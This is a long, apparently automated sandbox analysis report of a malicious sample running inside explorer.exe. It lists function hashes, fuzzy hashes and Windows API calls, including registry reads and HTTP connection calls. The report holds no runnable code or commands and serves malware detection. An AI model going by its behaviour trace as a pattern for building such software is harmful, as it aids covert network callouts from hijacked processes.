                                                                                                                                                                                                                        • Opcode ID: 3b0491e964f38344ca90d2161d0d2b382c469fd3054ceb33a9cd4b0d6b90b4f2
                                                                                                                                                                                                                        • Instruction ID: 865dd1185e7f3e280a6a872e91e18147cdc0eca56888fa6e5b047104b6960920
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3b0491e964f38344ca90d2161d0d2b382c469fd3054ceb33a9cd4b0d6b90b4f2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 391103B1640749ABCB04DFA8C841B96F3E9BF51350F10C52AFA669B6C0EB70E900CF90
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 02EE61F0: RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,F48E75C7,F48E75C7), ref: 02EE639C
                                                                                                                                                                                                                          • Part of subcall function 02EE61F0: RegQueryValueExA.KERNELBASE(F48E75C7,?,00000000,00000000,?,00000400,?,?,00000000,00000001,F48E75C7,F48E75C7), ref: 02EE63CA
                                                                                                                                                                                                                          • Part of subcall function 02EE61F0: RegCloseKey.KERNELBASE(F48E75C7,?,?,00000000,00000001,F48E75C7,F48E75C7), ref: 02EE63D6
                                                                                                                                                                                                                          • Part of subcall function 02EF0370: Sleep.KERNELBASE(000005DC,F48E75C7,?,00000000), ref: 02EF0402
                                                                                                                                                                                                                          • Part of subcall function 02EF0370: InternetOpenW.WININET(02F3CC08,00000000,00000000,00000000,00000000), ref: 02EF0411
                                                                                                                                                                                                                          • Part of subcall function 02EF0370: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 02EF0435
                                                                                                                                                                                                                          • Part of subcall function 02EF0370: HttpOpenRequestA.WININET(?,00000000), ref: 02EF047F
                                                                                                                                                                                                                        • Sleep.KERNEL32(000005DC), ref: 02EF3BE5
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Open$InternetSleep$CloseConnectHttpQueryRequestValue
                                                                                                                                                                                                                        • String ID: OnZp2OO6$UGQ+$UQ==
                                                                                                                                                                                                                        • API String ID: 3034029558-1400716429
                                                                                                                                                                                                                        • Opcode ID: b6ef3386361383d35b122811d988061929458d8e5a97344c2a513d00f8e75b26
                                                                                                                                                                                                                        • Instruction ID: 60d086464a6795f0a63bea4f7ef4af5858dbe7464a2b3505f9a094a735e539eb
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b6ef3386361383d35b122811d988061929458d8e5a97344c2a513d00f8e75b26
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ADE15A719002889BEB18DB38CD8879DBF72AF42308F50C29CE5159B3C6E7759A84CF91
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _strrchr
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3213747228-0
                                                                                                                                                                                                                        • Opcode ID: d725f28c003498a83adba3475cbb9d2ba75eb6362bbb9180f06b7f45438f7c42
                                                                                                                                                                                                                        • Instruction ID: fa8eefd3c111f1c140d8431fc82cb732563631ff1b002fd91f43cda2c6abba70
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d725f28c003498a83adba3475cbb9d2ba75eb6362bbb9180f06b7f45438f7c42
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D6B15972E012859FFB11CF68C980BEEBBF6EF553C4F9441AADA45AB241D3349941CB60
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AdjustPointer
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1740715915-0
                                                                                                                                                                                                                        • Opcode ID: 3d69cb35d8980570a57b3a0a16347bc290878ebac9dbd804cdb130f0a477ac7f
                                                                                                                                                                                                                        • Instruction ID: a773188139b04f100d41ef15bd4452d8109bcc741171482761ebd74de4202f1f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3d69cb35d8980570a57b3a0a16347bc290878ebac9dbd804cdb130f0a477ac7f
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B551AF72A047069FDB299F54D9C0F6AB7A5FF04784F14422AEB06972E0D731E841EB98
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetVersionExW.KERNEL32(0000011C,?,F48E75C7,00000000), ref: 02EE9A99
                                                                                                                                                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02EE9B00
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 02EE9B07
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressHandleModuleProcVersion
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3310240892-0
                                                                                                                                                                                                                        • Opcode ID: 0ddae22aae2ff8f88a5b7386293eff6f76a08b599541b8c5ef93b4e0e6b175dd
                                                                                                                                                                                                                        • Instruction ID: af527391f30adfdfef7f926931ac48faf04f92076b8eb8edbff8bce1e38846b4
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0ddae22aae2ff8f88a5b7386293eff6f76a08b599541b8c5ef93b4e0e6b175dd
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 37513770D502089BEF14EB78CD847DDBBB9EF45704F408299E40AA72C2EB749AC08F95
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • __Mtx_unlock.LIBCPMT ref: 02F05BE7
                                                                                                                                                                                                                        • std::_Rethrow_future_exception.LIBCPMT ref: 02F05C39
                                                                                                                                                                                                                        • std::_Rethrow_future_exception.LIBCPMT ref: 02F05C49
                                                                                                                                                                                                                          • Part of subcall function 02EE3A60: __Mtx_unlock.LIBCPMT ref: 02EE3B54
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Mtx_unlockRethrow_future_exceptionstd::_
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3298230783-0
                                                                                                                                                                                                                        • Opcode ID: bca3383d87730f2ede8f049e2abd3730f0357cb61ff252021e7ff8d68248b533
                                                                                                                                                                                                                        • Instruction ID: 617d8e060a2eebd51fab6fefe626b5fb11e5729c0f48eb04e56454808214a1e7
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bca3383d87730f2ede8f049e2abd3730f0357cb61ff252021e7ff8d68248b533
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E3412AB1D003489BDF14EBB4D880BAFBBB9AF05380F40456DE74657681EB71A544CFA2
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F26CFE
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F26D27
                                                                                                                                                                                                                        • SetEndOfFile.KERNEL32(00000000,02F2348F,00000000,02F16E41,?,?,?,?,?,?,?,02F2348F,02F16E41,00000000), ref: 02F26D59
                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,02F2348F,02F16E41,00000000,?,?,?,?,00000000), ref: 02F26D75
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _free$ErrorFileLast
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1547350101-0
                                                                                                                                                                                                                        • Opcode ID: 187f6273eeb0e0f8333c17208f040dedf7851755e95c260e3aefa7a6ed9cf104
                                                                                                                                                                                                                        • Instruction ID: 50e8bc273d5b8a27dc4c44a45217a6c7177d7ba0ffd07aab9bb26e8424d55ba6
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 187f6273eeb0e0f8333c17208f040dedf7851755e95c260e3aefa7a6ed9cf104
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1441D3729006199ADB156FB9CC44B9D77BBEF463E0FA40514EB15E72A0EB30D8488F21
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Mtx_unlock$Cnd_broadcastCurrentThread
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3264154886-0
                                                                                                                                                                                                                        • Opcode ID: edb3e382f3b3e9ec7b8f425a2741d7e56058cc7aa708aa8a276f6a3732427374
                                                                                                                                                                                                                        • Instruction ID: cb363fee9c54004f64b389e7a1893ab3aff03061424ead29d069816ee39adb6d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: edb3e382f3b3e9ec7b8f425a2741d7e56058cc7aa708aa8a276f6a3732427374
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3D41BFB1A416159FDB11DF65C880B6AB7E8FF093A4F048569EA1AD7780EB31E904CBC1
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 02F0E64B: _free.LIBCMT ref: 02F0E659
                                                                                                                                                                                                                          • Part of subcall function 02F1DEFF: WideCharToMultiByte.KERNEL32(00000000,00000000,8B18EC83,?,00000000,8B18EC83,02F17B47,0000FDE9,8B18EC83,?,?,?,02F178C0,0000FDE9,00000000,?), ref: 02F1DFAB
                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 02F1EABD
                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 02F1EAC4
                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 02F1EB03
                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 02F1EB0A
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 167067550-0
                                                                                                                                                                                                                        • Opcode ID: 3ecdbc6c687bc3822ae0f066e9e9f73825bedb6a56e41569c5ed840fe296c06f
                                                                                                                                                                                                                        • Instruction ID: 6a8bd1d600a0b2dfcb5c6ad73bacedb2de1b0459e7e8e00f83f9720895064ed6
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3ecdbc6c687bc3822ae0f066e9e9f73825bedb6a56e41569c5ed840fe296c06f
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E0218671A04209AFDB20AF659C80D6BB7AEFF443E47844519FE1997290DB31EC508F90
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,?,02F17607,?,00000000,00000000,?,02F17AC1,00000000,00000000,00000000,00000000,8B18EC83,02F43208,00000010), ref: 02F16825
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F16882
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F168B8
                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,00000006,000000FF,?,02F17AC1,00000000,00000000,00000000,00000000,8B18EC83,02F43208,00000010,02F10B22,00000000,00000000,00000000), ref: 02F168C3
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ErrorLast_free
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2283115069-0
                                                                                                                                                                                                                        • Opcode ID: af657897ccf225ec25181b01ffdb355cc1884de9dd71ed011298eb6683945c9e
                                                                                                                                                                                                                        • Instruction ID: f6851a8e2d33388ff006f3e4e970775469902f729fbbe399d54488c459ba8854
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: af657897ccf225ec25181b01ffdb355cc1884de9dd71ed011298eb6683945c9e
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0A11E576A442042BE61136B59CC4E2B769F9FD03F9BE40739FB24D61D0DF628816CE10
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 02F07CB9: GetModuleHandleExW.KERNEL32(00000002,00000000,00000000,?,?,02F07D0B,00000014,?,02F07D4C,00000014,?,02EE2D32,00000000,00000014,00000000,F48E75C7), ref: 02F07CC5
                                                                                                                                                                                                                        • __Mtx_unlock.LIBCPMT ref: 02F07D9E
                                                                                                                                                                                                                        • FreeLibraryWhenCallbackReturns.KERNEL32(?,00000000,F48E75C7,?,?,?,Function_00048330,000000FF), ref: 02F07DC6
                                                                                                                                                                                                                        • __Mtx_unlock.LIBCPMT ref: 02F07E01
                                                                                                                                                                                                                        • __Cnd_broadcast.LIBCPMT ref: 02F07E12
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Mtx_unlock$CallbackCnd_broadcastFreeHandleLibraryModuleReturnsWhen
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 420990631-0
                                                                                                                                                                                                                        • Opcode ID: 9b2bc23afb9f5cfcf92797320d6b0bd7de9284a391dad238905722ada41b1569
                                                                                                                                                                                                                        • Instruction ID: c368a6503648548e4f28b7f182bfa21bf00c1efe3655d1b4c612fe873e1e1ba5
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9b2bc23afb9f5cfcf92797320d6b0bd7de9284a391dad238905722ada41b1569
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7611D636D41614EBEA117B61DC81A1FF7AAEB11BE0F00485AFB05972D1CF75E8119AA0
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetLastError.KERNEL32(02F008E7,02F008E7,8B18EC83,02F10C77,02F17E78,?,?,02F09ABF,02F008E7,?,02F030BE,8B18EC84,76F90F00), ref: 02F1697C
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F169D9
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F16A0F
                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,02F09ABF,02F008E7,?,02F030BE,8B18EC84,76F90F00), ref: 02F16A1A
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ErrorLast_free
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2283115069-0
                                                                                                                                                                                                                        • Opcode ID: 85b57b72fa7e63ede2775a2b884aea3f2775ada99062fdacd98194797077bc3c
                                                                                                                                                                                                                        • Instruction ID: e0f7ff3e7d1c2d5185e9bc84cc75f002cb578e9607b724fff80818bc66b07e45
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 85b57b72fa7e63ede2775a2b884aea3f2775ada99062fdacd98194797077bc3c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 66110477B442042BEA1136B89CC4E2B769F9BD03F9BE40329F724D31D4EF6288529610
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetFullPathNameW.KERNEL32(00000020,?,?,00000000,?,00000000,?,02F25439,?,?,?,00000020,00000001), ref: 02F19905
                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,02F25439,?,?,?,00000020,00000001), ref: 02F1990F
                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 02F19916
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ErrorFullLastNamePath__dosmaperr
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2398240785-0
                                                                                                                                                                                                                        • Opcode ID: 9b0a7ec9d0eee2d6075ae9d0f3648dc2e27923ba5d6c9a1d9ca3149d85e18d2a
                                                                                                                                                                                                                        • Instruction ID: b5ee28ab8831fdd0a5aa477bef5646b03921ac293b6e0b4606a878fb0abbf76b
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9b0a7ec9d0eee2d6075ae9d0f3648dc2e27923ba5d6c9a1d9ca3149d85e18d2a
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BCF06D32A00119BB9B202BA2CC18A5BFF6EFF453E03844519F61DC6424CB71E861CBD0
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetFullPathNameW.KERNEL32(00000020,?,?,00000000,?,00000000,?,02F253C4,?,?,?,?,00000020,00000001), ref: 02F1996E
                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,02F253C4,?,?,?,?,00000020,00000001), ref: 02F19978
                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 02F1997F
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ErrorFullLastNamePath__dosmaperr
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2398240785-0
                                                                                                                                                                                                                        • Opcode ID: a71ec04ae8626412ffb78d25914532997f0625c008a083428f895c513c4268fe
                                                                                                                                                                                                                        • Instruction ID: 7de16143c0f0322b753169e1953b63415f12b35e23432cd52a03d18eb343647b
